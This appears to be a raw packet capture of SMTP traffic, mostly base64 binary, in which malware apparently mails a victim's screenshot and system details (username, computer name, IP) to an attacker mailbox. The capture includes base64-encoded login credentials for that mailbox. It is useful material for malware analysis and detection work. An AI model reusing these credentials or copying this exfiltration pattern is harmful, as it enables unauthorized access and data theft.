QAUUUUAFFFFABRRRQAUUUUAFFFFABRRR\r\nQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAF\r\nFFFABRRRQAU+BxHMjldwBzt9aZQDg5FAHXYJSKTkLuBIParUjLtPI/76rJ0zUGuICszLuBxj\r\n1FWVfJIycZxg1W5OxNJMCoc8hDyOlThge4/76qqp3upUM34cVaVSPX9KGCM/XP8AkHN0+8O+\r\na5eup13P9mt1+8OtctUlBRRRQAVt6C+9HiCEEHO8fyrEq3p15JaTjaQFYjdmmhM6m2+QSBiM\r\n7yeuKUyqj+x9OearPMGwynJzjIpQ46EnJ9OtOwrk0LgMycZByTnrmpgR6j/vqoYFbYOGH5ZP\r\n1qfn/a/SkM5HVv8AkIzf71U6uat/yEpv96qdIYUUUUAXdEONc08noLmP/wBCFey5rw2tC013\r\nVLLH2e+mUAYCs25R+ByKwq0nPZlRlY9hJrOsT88x9hzz/OuLtPHt/FgXVvDOPVcof6j9K09N\r\n8YaYWkNwZICw/iQt+oyf0rn9lOMZKxopJtE3xEI/4R+0/wCu6/8AoL151XReJ/EUeqr9ltot\r\nsCSbxIScucY6dutc7XXSTUUmZSd2FFFFaCCiiigAooooAKKKKACiiigAooooAKKKKACiiigA\r\nooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK\r\nKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA\r\nooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK\r\nKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA\r\nooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK\r\nKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA\r\nooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK\r\nKACiiigAooooAKKKKACiiigAoorf0bTbUPDJczBpZreaVIDFuXAVwCWzwcgkcdutHS4GHFK0\r\nMgkQ4YdKs/2ncZB+XIHpWi3h6KOG3abUoIpZfLZ1dkARXxz9/dkAgnKge9WLfREay1KIiRBA\r\n0UjTTwBXSPDliAGOQcDGDzx9aNg3MUalcjgSED2Jpf7Tuv8AnofzP+Nab6RYTwaaLWeVGlhk\r\nlmkeLHyoWycbzzhcADr6ioo9FtpENwt84tBbtOHaD5/lcKV27sZ545x9OwBnS3080ZSRyVPY\r\nk1WrVXTfJ1yytopw6XDRNHI8IPD4wShyO/TkVMuhRSQxk3pFzPFLLHGIPl+QtkFs8Z28cGjz\r\nAxKKu6pbtbzwqzoxe3jk+WMIBuUHGB1+veqVABRVnTrQXt0Imk8pArO74ztVQSeO5wOlbjaL\r\na3lvY/Z7hY4EtXlknZFRm/elRkMwGeQOW7delAGHDfTQxCNSNo6ZFP8A7SucDDAY6Yq5PosU\r\nNtcTR3ZuTE5GLdFkAXAIZyH+UHOMjcMjGa1rvRLCPxLNDeM0YkWaWOCGL5VQKxU53DB4JwPQ\r\nZ68AWOd/tO6/56H8z/jR/ad1/wA9D+Z/xq5Fo0EkUI+2Os9zG8sCGHgqpONzbvlJ2ngA/Wib\r\nRYY7Zil4XuFtUujH5OFCsBxuz1G70x79qAMqWVppC7nLHqaZWxp2lfb7O333CQxvLMM+SCV2\r\nRhySRyR2x2px0pI7aWe2ufMgezM6mS3UMcSBCuMnac9waHoBi0UVc0mW2hv0e8UGPDAEpvCM\r\nQdrFf4gDg4/n0oAp0V1kEBigvJrltLictbmO4NqrxMjb+VUIcZx6Dpzg1R1q1ihtH8u1WB/7\r\nQlUJwWVdqELkduadtbf10/zAwaK666tLQ6jNMttCIrC7l81FQBWULuVSO4ypH41Vurc6fJHD\r\nZw27zXt0xhMkKSfujgJgMDjOT+VJagc3RXTpDa6trd9aLBGtsrLtlhjRMFSF9h854x6kHtTz\r\nbwzWKLEkFteXiTS+WbVGAClhsDH7mAp5AyT1Io6XA5Wiuj1zSW07QbUNZtHJHOyyzGMjeSqn\r\nrjoCSB24Nc5R1DpcKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACr9vrN/bWwghmUIqsq5jUsFb7wDEZAOemaoUUAXjq120MUTmCRYgAhkt43YAdBuKkke\r\n2cUv9tagJC6zhCShwkaqBtyFAAGAOTwODk5qhRQBeXWL1fJ2yIvkszR7YUG3Ocjp905Py9Oe\r\nlWbTXZonupJyrO9t5ESrCmxfmBxsxtxwe3U1kUUAXhrF+JmlE+HaSOQ4RcBk+5gYwAPQcUwa\r\nneK8TCbmJHRDtHAfO4dO+4/nVSigCW4uZbllaZ9xRFjU4AwqjAHHsKioooAltbmazuEnt32S\r\nJ0OAfY5B4Ix2q4dc1AypJ5yfJGYgnkps2E5K7cbSM9sVnUUAXTqt0Y5Y18hBNw5jt40OOOAQ\r\noIHHQcVJ/bmomYStOrSB2cFokOCww3UdDnkdPas6igC8NXvVt2gWRBGdwGIkyob7wU4yoPPA\r\nwOTU+o61Lcwx28B2Qi3iifMahmKgZG4clcjOM/hWVRQBfbWdQaRpDcfMzu5OxfvOu1j07jio\r\nhqN2tuIBL+6ERh27R9wtuI6evNVaKACpba4ktZhLFt3AEYdA6kH1BBB/GoqKANFdc1ANIxki\r\nYSbQVe3jZRtztwpXC4yegHWmwazfwNIyzhzJIJW82NZPnH8Q3A4PuKoUUAWUv7qOK5jWdtt1\r\njzs878HPJ+tPGrXwuLefzyZbaMRQsVB2KM4HT3NU6KAJlupltmt1fEbOHYADJI6c9e54q3Jr\r\nmoyJKj3APmbtx8td3zfewcZGcc4xnnPWs6igCzDf3NukKxS7RBL50Y2g7X456ewpx1O8MRiM\r\n3yGMxEbR90tvI6f3uaqUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFF\r\nFFABRRRQAUUUUAFFFFABRRRQEHLO Host\r\nAUTH login ZnJhbmtsb2dzQGVuZ2luZXJvb20udG9w\r\nNTY2MjIwNWFjZUFDRQ==\r\nMAIL FROM:<franklogs@engineroom.top>\r\nRCPT TO:<frankjoe@engineroom.top>\r\nDATA\r\nMIME-Version: 1.0\r\nFrom: franklogs@engineroom.top\r\nTo: frankjoe@engineroom.top\r\nDate: 27 Jun 2019 04:21:00 -0700\r\nSubject: user/Host Screen Capture\r\nContent-Type: multipart/mixed; boundary=--boundary_1_4fe8c05f-b1bd-40a9-8bb4-04e6a9181379\r\n\r\n\r\n----boundary_1_4fe8c05f-b1bd-40a9-8bb4-04e6a9181379\r\nContent-Type: text/html; charset=us-ascii\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\nTime: 06/27/2019 04:04:53<br>UserName: user<br>ComputerName: Host<br>OSFullName:=\r\n Win32NT<br>CPU: Unknown<br>RAM: 4095.55 MB<br>IP: 0.0.0.0=0A<hr>\r\n----boundary_1_4fe8c05f-b1bd-40a9-8bb4-04e6a9181379\r\nContent-Type: application/octet-stream; name=JkHuF8HIU2.jpeg\r\nContent-Transfer-Encoding: base64\r\n\r\n/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9\r\nPDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhC\r\nY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wAAR\r\nCAPCB4ADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAA\r\nAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkK\r\nFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWG\r\nh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl\r\n5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREA\r\nAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYk\r\nNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOE\r\nhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk\r\n5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDz+iiigAorX8OabBqd1JFKcuq7kQttDeuT\r\nXU/8I5JAv7vRLdx679/8zTSE2ef0V3E2myovz6NBGPXyQP51Qayh34aK3U+h2CnyhzHLUV15\r\n0GxktJZpxHbqqlvMST29OhrkKkYUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUV0Hg2wi1DVh\r\nHMOAR/Ik/wAqUnZXNKcOeVr2/wCBqc/RXtH/AAj+mf8APt/5Eb/Gj+wNM/59v/Ijf41N5dvx\r\n/wCAXy0f5n9y/wDkjxeivZJ/DemzQsiwmMnuGJ/Q5rzTxDoM+kXTAqTF1BHp/hRzNOzB0otX\r\npu9vK36sxqKKKswCiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooA1vDE3la5b56PlfzFb2p3EkNyNkrp/usRXJ6fL5F/by5xtkB/Wu1v5reAhZlXdI\r\n3GQOR61pTV3YiehlNezuMNPIw9C5NSWb7pGye1Ub0xxTkRsCDzgdqfYzKpdmYBQOSaqWjsSt\r\ndR2sv+4kJPOMVzlaurStJHvOVVjhVPXHqayqyZogooopDCvQvh9Z6dLoNzPf21q+252+ZPGp\r\nwNq4GT7n9a89rtvDoB+H2qAgEfaRwTj/AJ50m7K5UFzSSJrzWLRL+aO00fSmgQlVL2o3ZHrz\r\nVdtbTDEaNo4GQATa+2T3qnp8IkvEBYLz3YNx6H2rQ1jS7aGGNoJSAOobnt14+lcMsRaai3ue\r\nnyUotRcTa0690G/aGGPSbYzupL4tFCqR61rw6TpkiknTLLg9rdf8K4HSp72C9VbC5jEknyjP\r\nP6EV6ALgSSrArgTBAWA4BPfFdMZ9zjxFJQl7pWfTNNMU3/EtshhGIIgX/CvHa9sa4hmgnWI5\r\nZUIPGO1eJ1pFpq6dzms1owoooqgCur+Hn/IbH+f4WrlK6v4ef8hsf5/haont935m9D436S/J\r\nnqFZd9dXEOowJHJhGeNdm0fMGLZOevGBWk7rGhZ2CqOSScAVhXNxJeams9lC862w2xsoG0sf\r\nvZJ9uKU3ZFYaHNJtrS3U36x/FFvHNo8jyKCYyCD9SAR+tOk1ryiu+BVO8I0ZkxIvvtxz+Bp/\r\niL/kCXH/AAH/ANCFEpKUXYqjTnTrQcurR4vRRRWhyBRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAKDgg+lddrRS7021m81UcBflJH8WBXIV6H4Zg\r\ntrvSrOUxRPIgILSAHoSOM1SdhNXOfltlhtWiYA4B+ZRyff61T09BJKfMB+XHyn1r03yUTlY0\r\nU4xlVANVJrZfKkMoWQHsy1dSopWsrWJjFrc841p8yovoM1m1o6+oj1aWNRgJgY9OM1nVkWFF\r\nFFABXc+F0kl8B6mkMfmSNcgBcZ/uVw1elfDZ9nh+6YjOLk/+grSew4vlaZhREwExyBty5354\r\nPHp6U+eT5HKFt4ZsAt0UelbV94du7y6vL1XUvLJ8instR6noBW0iezDvKrZkyfzrjlRs+Y9S\r\nOIpO19zKs9Pml2XcRWIhshvX3xW8bwR3TOzjcwUA/Xg/yNQJb/ZrcQoWIHNcdfC6N7IJFcyF\r\nvfp2xXHBPEN62SJrTtra56NaOGjmKngxN+NeRV6d4fjlispVnJ8zymyD1rzGu7Bq1K3mcVf4\r\nwooorrMQrq/h5/yGx/n+Fq5Sur+Hn/IbH+f4WqJ7fd+ZvQ+N+kvyZ6Lf2bXYi2TeWY23DKbh\r\n0x09altreO1gWKMHaO56k9yfeotWR5NIvUjVmdoHCqoySdp4Fc7NpckDwGe0MiOkpWK3RmWJ\r\niqBcHHykkE54qrK9zNzk48vQ6sopYMVBYdCR0rO8Rf8AIEuP+A/+hCqmgWFzDd3FxeRx+bkK\r\nZGjPmMdiZIbONuc9utW/EX/IEuP+A/8AoQqZ/CzTD/xoeq/M8XoooqzAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiitObRJYbRphc28jrCk7wqW3qj\r\nYweVAP3h0JoAzK3NB8RyaQhhkgW4tyc7ScFT7GsOigDu7nxrpsttiG2uYZsdQFxn65rAPiKQ\r\nS+YPMlYdPNbj8qwxycVPfWkljezWspUyRMVYqeCR6UAMnmkuZ5JpW3SSMWY+5qOrtjppvLea\r\ndrqC2ihZVZpt/JbOMbVPoaivLN7OWSGZ086ORo3jGcjHfOMYP1oAr0UUUAFdL4a8WDQbCW1N\r\niLgSS+ZuMu3HAGMbT6VzVFAHeD4kADA0gAe1x/8AY0w/ERCMHR1x/wBd/wD7CuGopNJgdsfH\r\n0B/5gcf/AH+H/wARTP8AhOrXcW/sGHce/mjP/oFcZRS5I9h8z7nanx8nlsiaQqZUrxP0/wDH\r\na4qiimklohXuFFFWrKya881vNjhihXfJLJnaoyAOgJPJA4FMCrWjomqvpN556Z+oHI/zk1Jb\r\n6E9wisl7aDzJjBECX/esADxhcDO4dcfhUC6VcNLYx7ow16dseSflO8p83HqPek1fQqE3B8yO\r\nsHxElx/x7qf+Af8A2VH/AAsSX/n2T/vg/wDxVcvHol1LeRW0bRF5YjKrZO3AyMdOuQR9cU22\r\n0ozwwSSXlvbm4JESSCQs2Dj+FT3pKPmautb7K+46r/hYkv8Az7J/3wf/AIqqeqeN5b+0aDyg\r\nuecBcAn35NYZ0S48/wAqOWGUi4NuzIxwrDucjpgE59jUVxpxtrVZpbqAM43RxfNvdc4DD5cA\r\nHryQfalyprcaruLukk/QpUVbvtOnsI7Z5yv+kx+Yqg8gZxz71UqznCiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigArobvVbW6tTaGRERbWHbIse0s6KN0b\r\nEDJBPTOQCBXPUUAdfea5ZTX0Dia2NsrsYdqTGS2JQhSVbKgKcHCegwKqWVyJmuRqF81/HbBb\r\ntZsuwLLxsy4BwcgdOwrm6kFxMLc24mkEBbcY9x2lvXHTNAGvPqJudJQR6iYH+c3Nud4Nw5bO\r\n7Kgg8ED5iMba1W12zzf/AGae2Rpbl3JuFmCzRkAAfJ1xzwwxz9a4+ihgbehXsVvYXkTXVtby\r\nySRMhuIDKpC7s8bW55FXoNZ0+KfzIZWjUXNzIodWYgPEFUnrnLe5965aih6gjS1a+F/b2DyT\r\nNNdJCUmd8lid7EZJ68EVm0UUAFFFFAElukclxGk0vlRswDybd20Z5OB1xXUR3kdno2n+ZfAQ\r\nG2nVrbY2bjLuF7Yxn1PHauTpzSyOiI7syoMICchRnPHpzQ9VYDoZ9ahmtpbV7hntvsEKJEQd\r\nvmrszxjrw3P61Y1e6FzoV9LHffaLd7qIQR7GUQjDHZyABgY4GR+dcpVi6vry8CC7up5wn3RL\r\nIW2/TPSh6gtCvRRRQAVe0mUw3Dst7FanZg+dGXSQd1YANn8RjiqNFAHWwappcSlba4gggS8a\r\nUxvAzOyFVB8s7SVJIbHzKRxzVO0vNPJ0y4e6EP8AZ7sTAyMWcBy67SARznHJFc9RQHkb1vrM\r\nUOlB1Yi/jmwigHHllxJ1/wB5cfjUkuoacuvLcW8n+i2UJNsCh+d+WAx2+djyfSudooA2tJvr\r\nSzt5Fnkd2viYpypYeVH6+5yc9+AR3q/LrFoLQLLdfa4FgiiFltdQXQqC+SMAEKeevOCK5aig\r\nDe1W90/VVssSS27KkrSs58zaxZmC8Kuck9RwM+1ZcsFokDNHeeZIBGQnlEZJB3DP+ycD3zVW\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACirX9nXf/PL\r\n/wAeH+NH9nXf/PL/AMeH+NTzx7m/1at/I/uZVoq1/Z13/wA8v/Hh/jR/Z13/AM8v/Hh/jRzx\r\n7h9WrfyP7mVaKtf2fdf88v8Ax4f41FNbywbfNXbu6cg0KUXsyZUakVeUWl6EVFFFUZBRRRQA\r\nUUuCexo2n0NACUUu0+hpKACiiigAooooAKKKOtABRS7T6GjafQ0AJRRgjqKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAOmzS7qjzRmv\r\nOsfY8xMI5WiaVY3Ma8M4U4H1NMzW3pIV9InlJ+S3jmDj3ZVC/rn8qwN1U42MoVuZtdh+azNY\r\nOfJ/4F/Sr+aztWOfK/H+lXSXvo5sdK9CXy/NGfRRRXYfOBRRUkFvLcybIULtjOPahuw0m3ZH\r\npvwy/wCRdn/6+m/9BSuskkSJC8jBVHUk1xHgvUItE0aS3vEk81py4VADwVUevsa0ZtWt9TvY\r\nITFMEZwgG8ADJxnoc1HtI9zVYeo1exv/AG+JoPNhPmLu2nqOcZrlfEfhVNbs21CwQJfBnJXo\r\nJhuPB/2vQ/gfbV01ozpzRtNFG3mlsO4HGBVyztlMnyXIdASWWOdsDPsD60XfN5EWi4+Z4pIj\r\nxSNHIrI6khlYYII7EU2us+I9vFb+IIjEuDJbq7kkksdzDJz7AflXJ1ZAUUUUAFaPh3/kYtM/\r\n6+ov/QhWdWxoVncRarY3jxkQRzRyFsj7oIPT6Um0tyoxlLSKue0VXkvbeOZYWlHmMQAo55/p\r\nWRP4otdjLFHMWIwGwBj9ao2kkMklrcqHQGfDGRwem05zgetSpxbsmXKjOK5pLQ2b9LbUmWwu\r\n4BJE7spB74VufY15h4o8NXGgXf8AFLZyH91Lj/x1vf8An+YHpcyQySlxeQD5iykTYI/L603X\r\nLGN/DV+txulK28jfNIxGQCQeT2IFEW+pM1HdHjNFFFWQFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRU9laS313FawY8yU7V3HAzQBsbqN1aEmh3cT7\r\nJZbVHxna06g/zq5ZaTDbpHc3pikhD4kk80MiYGcAKcliB3x9DXL7KXY+geMpdHcfaqLTRI4H\r\nid31FtzKi5ZY1+6QP97n3xWZcaZdW8hSQRr3UtIq7h6jJBo1TWJ9QuHIdo7f7scKnCqo6DFV\r\n4L6SFPLZUlizny5VyAfbuPwpO2wR5173VjZo5IJNkqMjdcEdqzNTOfK/H+lal9fS30yyShF2\r\nIEREGFVR0ArK1E58v8f6VUF7xlipN0Hfy/MpUUUV0niBWp4e/wCP5/8Arkf5isutTw9/x/P/\r\nANcj/MVFT4GbYf8AixO10/S4ruzNxLdiAeb5QBTOTgHrn3pkVq9lr0FvIQWSdOR35BFWrC+i\r\ns9DbKwyyi53LHIenyj5sVTtriS61u3nlILvOhOPqK5Pd0tuemnNuV9tSdUZ2CopZj2Aya6XS\r\nLJrS3YycSSHJHoOwqXzpf+ett/30aPOl/wCett/30a7OZHk8jPO/id/yMFv/ANeq/wDobVx1\r\ndj8Tv+Rgt/8Ar1X/ANDauOqiAooooAK7TSIftEVlDu2+YI0zjOM4FcXXb6Cyo+nM7BVUxEkn\r\nAA4rCv0O3Buzlbsal9oy21tLNDdrOIX2SLs2lT09abbf8guP/rs//oKVJrGqGZ57WBIlhaQl\r\nmj6yY7k1peGXdNMfY0S5mb75x/CtRDlU9Darzuj7xX07T5LuZSVIhByzEdfYVs6//wAi/qX/\r\nAF6y/wDoBqXzpf8Anrbf99GqusO7+H9T3tE2LWT7hz/Aa6FJM85xaPFKKKKokKKKKACiiigA\r\nooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK\r\nKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA\r\nooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK\r\nKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA\r\nooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK\r\nKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA\r\nooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK\r\nKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACtXwv/AMjHY/8AXT+hrKq5\r\no94mn6rb3boXWJtxVepoA7bXJJdR1ZLGCMMYjtBxzkjJJPYCor23ms/C9xBOpVlvB9D8o5Ht\r\nVVfF+mpqDXqWVysrLtcB1ww9+PYdKr+IPFltq+lPaR20sbFlYMxBHFaTneHIhU/dnzsy80bq\r\nyKK5vZeZ6P15/wAv4mtuqpfHOz8aqUU4ws7mVXFe0i42CiiitDkCrml3iWVy0kiswKbfl+o/\r\nwqnRSaTVmVGTi+ZHeaRaT6zZNdWUZaNXKEMQDkAH19xV6y0u+g1G1aS1lCrKhJAyAMj0ritL\r\n8R6rpFs1vYXIiiZy5Xy1bnAGeQfQVc/4TfxD/wA/4/78x/8AxNZewje6Or65NqzSPVPJl/55\r\nW3/fJo8mX/nlbf8AfJryv/hN/EP/AD/j/vzH/wDE0f8ACb+If+f8f9+Y/wD4mtOVH